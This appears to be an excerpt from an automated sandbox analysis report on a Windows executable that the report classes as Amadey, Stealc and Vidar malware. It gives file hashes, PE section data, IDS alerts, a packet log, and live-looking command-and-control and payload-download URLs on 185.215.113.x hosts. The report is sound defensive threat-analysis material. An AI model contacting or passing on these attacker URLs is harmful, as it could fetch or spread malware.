                    • Execution Graph export aborted for target file.exe, PID 7108 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    TimeTypeDescription
                    14:09:03API Interceptor779x Sleep call for process: explorti.exe modified
                    19:07:56Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    185.215.113.19file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.19/Vi9leo/index.php
                    185.215.113.16file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16/well/random.exe
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16/steam/random.exe
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16/well/random.exe
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16/well/random.exe
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16/well/random.exe
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16/well/random.exe
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16/well/random.exe
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16/well/random.exe
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16/well/random.exe
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16/well/random.exe
                    No context
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadeyBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, StealcBrowse
                    • 185.215.113.16
                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                    • 185.215.113.16
                    No context
                    No context
                    Process:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1638400
                    Entropy (8bit):7.955142396511313
                    Encrypted:false
                    SSDEEP:24576:ULGk0+QMiQ/s4oeI0uWqD3qcrantWSvMP17B2BSLiI7YJisKRgOLqN:ULGFQluWqDrran/417wBhKjL+
                    MD5:7B9E638699028F93A18B56CD366E2F28
                    SHA1:7D0245A5AD7DAA8456FCFEE0FAC2CBB906114B03
                    SHA-256:85790A170922903D74266882C3A303F3C46656B4C5D6AD8779358E6C522F0D5E
                    SHA-512:3B1F47E0BFE72611C62FC91E7D0CAB322DA4469BCCA9ADF243C883A9257C242C88D7E59C607C53EF769F15D1CB47D348BEC8F96ABCD83908FC5E1CF675A19BD2
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f.....................B".......i...........@...........................i...........@.................................P.#.d.............................#..................................................................................... . ..#......<..................@....rsrc ......#......L..............@....idata ......#......L..............@... . +...$......N..............@...agodkpeb.p... O..h...P..............@...frgsmfqf......i.....................@....taggant.0....i.."..................@...................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1884672
                    Entropy (8bit):7.949248176915492
                    Encrypted:false
                    SSDEEP:49152:ReTfFaz/B/1mN6QUASzMvovH/ifnqXkTZROKjVprs:69a+N6QU94oCfH+gvrs
                    MD5:457D9A15D305DF62FE34C5076F3CAD9D
                    SHA1:7A068FB1E761874759A89534F39C1EB109367448
                    SHA-256:572D806C0B56D27FE05562301DE6A9ED45CDA3F36AEF2F6E370867D9F3847013
                    SHA-512:5D1F7A3071AD26AB2F2A3B163770A86DED232B038CF05AE9195690BD784F9D5A1D19143ADD444756184E0901D0BDA759140AF9EE35AF75D1E905F3BA493C0E01
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: ReversingLabs, Detection: 58%
                    • Antivirus: Virustotal, Detection: 55%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....A.f..............................J...........@...........................J.....+9....@.................................W...k.............................J.............................P.J..................................................... . ............................@....rsrc...............................@....idata ............................@... .P*.........................@...mlkfqtwe......1.....................@...ezviljwn......J.....................@....taggant.0....J.."..................@...........................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    Process:C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):1638400
                    Entropy (8bit):7.955142396511313
                    Encrypted:false
                    SSDEEP:24576:ULGk0+QMiQ/s4oeI0uWqD3qcrantWSvMP17B2BSLiI7YJisKRgOLqN:ULGFQluWqDrran/417wBhKjL+
                    MD5:7B9E638699028F93A18B56CD366E2F28
                    SHA1:7D0245A5AD7DAA8456FCFEE0FAC2CBB906114B03
                    SHA-256:85790A170922903D74266882C3A303F3C46656B4C5D6AD8779358E6C522F0D5E
                    SHA-512:3B1F47E0BFE72611C62FC91E7D0CAB322DA4469BCCA9ADF243C883A9257C242C88D7E59C607C53EF769F15D1CB47D348BEC8F96ABCD83908FC5E1CF675A19BD2
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b...............u^......uk......u_......{v.....fz.......{f..............uZ......uh.....Rich............PE..L...M..f.....................B".......i...........@...........................i...........@.................................P.#.d.............................#..................................................................................... . ..#......<..................@....rsrc ......#......L..............@....idata ......#......L..............@... . +...$......N..............@...agodkpeb.p... O..h...P..............@...frgsmfqf......i.....................@....taggant.0....i.."..................@...................................................................................................................................................................................................................................................
                    Process:C:\Users\user\Desktop\file.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):288
                    Entropy (8bit):3.4359806921285827
                    Encrypted:false
                    SSDEEP:6:DX4RKUEZ+lX1cI1l6lm6tPjgsW2YRZuy0lbEtft0:D4RKQ1cag7jzvYRQVAtft0
                    MD5:CD04D88D3042DE77AD56E1DD87DDB979
                    SHA1:44940F793B6E5E97C8ABA5B0D02B1D8DADA4C032
                    SHA-256:703B1B31D41B76C78F3FBE404260DFC0135B87FD331EB2EAF3E164031BE6F056
                    SHA-512:ED363B5E02D9B8B663905BB32B51E064FB6ACB0F2BA7967D90F94CA6974EE7458655742B04999A1970FF8403BBDDB3D50E0E0053BD45D39AC056AD3F18CA35B3
                    Malicious:false
                    Reputation:low
                    Preview:.......,.D.M.Q.<.&/.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):7.949248176915492
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:1'884'672 bytes
                    MD5:457d9a15d305df62fe34c5076f3cad9d
                    SHA1:7a068fb1e761874759a89534f39c1eb109367448
                    SHA256:572d806c0b56d27fe05562301de6a9ed45cda3f36aef2f6e370867d9f3847013
                    SHA512:5d1f7a3071ad26ab2f2a3b163770a86ded232b038cf05ae9195690bd784f9d5a1d19143add444756184e0901d0bda759140af9ee35af75d1e905f3ba493c0e01
                    SSDEEP:49152:ReTfFaz/B/1mN6QUASzMvovH/ifnqXkTZROKjVprs:69a+N6QU94oCfH+gvrs
                    TLSH:189533457B2A348FC16F4ABF65B7AD00E31D26EB0EF7DE616C44253909E656023E3C61
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x8ac000
                    Entrypoint Section:.taggant
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                    Time Stamp:0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                    Instruction
                    jmp 00007FA934B65F0Ah
                    push fs
                    sbb al, 00h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    jmp 00007FA934B67F05h
                    add byte ptr [0000000Ah], al
                    add byte ptr [eax], al
                    add byte ptr [eax], dh
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add eax, 0000000Ah
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [ecx], al
                    add byte ptr [eax], 00000000h
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    adc byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add al, 0Ah
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x4aa6a00x10mlkfqtwe
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                    IMAGE_DIRECTORY_ENTRY_TLS0x4aa6500x18mlkfqtwe
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                    0x10000x680000x2dc004aca0145e458d87ae2f6771bf04ffc1fFalse0.9999786543715847data7.988355421365411IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc0x690000x1e00x200dcf3fb9262bc1e7ce53de36e3dab9b34False0.58203125data4.543405225559806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    0x6b0000x2a50000x2005eb6254b241f8bd7e63ba8c5e40f4d98unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    mlkfqtwe0x3100000x19b0000x19aa0084eb0f165dafeb52f23dcbcf0207cfe2False0.9943439640410959data7.953079364825396IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    ezviljwn0x4ab0000x10000x400adab22a91a40aeb9b18cfcc5cb3a582aFalse0.7392578125data5.802495446742714IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .taggant0x4ac0000x30000x2200a09a4aab17da90009e89622a2deb36f9False0.05434283088235294DOS executable (COM)0.7477435209845513IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    NameRVASizeTypeLanguageCountryZLIB Complexity
                    RT_MANIFEST0x4aa6b00x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                    DLLImport
                    kernel32.dlllstrcpy
                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States
                    TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                    2024-09-01T20:07:49.855958+0200TCP2856122ETPRO MALWARE Amadey CnC Response M118049737185.215.113.19192.168.2.4
                    2024-09-01T20:09:06.811186+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H34973880192.168.2.4185.215.113.16
                    2024-09-01T20:09:05.654798+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M314973780192.168.2.4185.215.113.19
                    TimestampSource PortDest PortSource IPDest IP
                    Sep 1, 2024 20:09:04.776560068 CEST4973780192.168.2.4185.215.113.19
                    Sep 1, 2024 20:09:04.784066916 CEST8049737185.215.113.19192.168.2.4
                    Sep 1, 2024 20:09:04.784164906 CEST4973780192.168.2.4185.215.113.19
                    Sep 1, 2024 20:09:04.784384966 CEST4973780192.168.2.4185.215.113.19
                    Sep 1, 2024 20:09:04.789221048 CEST8049737185.215.113.19192.168.2.4
                    Sep 1, 2024 20:09:05.654714108 CEST8049737185.215.113.19192.168.2.4
                    Sep 1, 2024 20:09:05.654798031 CEST4973780192.168.2.4185.215.113.19
                    Sep 1, 2024 20:09:05.657558918 CEST4973780192.168.2.4185.215.113.19
                    Sep 1, 2024 20:09:05.662343979 CEST8049737185.215.113.19192.168.2.4
                    Sep 1, 2024 20:09:05.968554020 CEST8049737185.215.113.19192.168.2.4
                    Sep 1, 2024 20:09:05.972673893 CEST4973780192.168.2.4185.215.113.19
                    Sep 1, 2024 20:09:05.976645947 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:05.981399059 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:05.984592915 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:05.984725952 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:05.989495993 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.811089039 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.811148882 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.811161041 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.811186075 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:06.811211109 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:06.811388016 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.811436892 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:06.811469078 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.811481953 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.811491966 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.811513901 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:06.811538935 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:06.812215090 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.812232971 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.812244892 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.812271118 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:06.812289953 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:06.816607952 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.816668034 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:06.817040920 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:06.817101955 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.015873909 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.016002893 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.016014099 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.016072989 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.016072989 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.016346931 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.016379118 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.016390085 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.020829916 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.020840883 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.020852089 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.020860910 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.020868063 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.020879030 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.020895004 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.020941019 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.021240950 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.021259069 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.021269083 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.021280050 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.021281004 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.021292925 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.021303892 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.021311998 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.021312952 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.021342993 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.021354914 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.022078991 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.022090912 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.022099972 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.022111893 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.022124052 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.022134066 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.022151947 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.022171021 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.022677898 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.022689104 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.022697926 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.022711992 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.022726059 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.022753954 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.216665030 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.216723919 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.216833115 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.216845989 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.216882944 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.216896057 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.217317104 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.217365026 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.217483997 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.217494011 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.217525005 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.217536926 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.217677116 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.217688084 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.217698097 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.217710972 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.217715979 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.217727900 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.217752934 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.217766047 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.218437910 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.218451023 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.218461037 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.218472004 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.218485117 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.218504906 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.218535900 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.219297886 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.219307899 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.219314098 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.219320059 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.219329119 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.219342947 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.219372988 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.219398975 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.220077991 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.220088005 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.220094919 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.220101118 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.220112085 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.220139027 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.220150948 CEST4973880192.168.2.4185.215.113.16
                    Sep 1, 2024 20:09:07.220890045 CEST8049738185.215.113.16192.168.2.4
                    Sep 1, 2024 20:09:07.220902920 CEST8049738185.215.113.16192.168.2.4
